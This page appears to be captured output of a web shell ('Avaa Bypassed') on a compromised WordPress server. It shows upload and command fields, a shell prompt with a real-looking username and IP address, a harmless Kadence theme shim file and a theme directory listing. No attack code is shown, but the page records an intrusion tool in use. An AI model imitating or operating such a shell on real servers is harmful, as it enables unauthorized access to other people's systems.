[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.136.22.12: ~ $
<?php
/**
 * Shims for recent WordPress functions
 *
 * @package kadence
 */

/**
 * Adds backwards compatibility for wp_body_open() introduced with WordPress 5.2
 */
if ( ! function_exists( 'wp_body_open' ) ) {
	/**
	 * Run the wp_body_open action.
	 *
	 * @return void
	 */
	function wp_body_open() { // phpcs:ignore WPThemeReview.CoreFunctionality.PrefixAllGlobals.NonPrefixedFunctionFound
		do_action( 'wp_body_open' ); // phpcs:ignore WPThemeReview.CoreFunctionality.PrefixAllGlobals.NonPrefixedHooknameFound
	}
}

Filemanager

Name Type Size Permission Actions
components Folder 0700
customizer Folder 0700
dashboard Folder 0700
meta Folder 0700
template-functions Folder 0700
back-compat.php File 2.87 KB 0644
class-kadence-css.php File 43.6 KB 0644
class-local-gfonts.php File 19.61 KB 0644
class-theme.php File 9.06 KB 0644
functions.php File 1.56 KB 0644
template-hooks.php File 6.76 KB 0644
wordpress-shims.php File 519 B 0644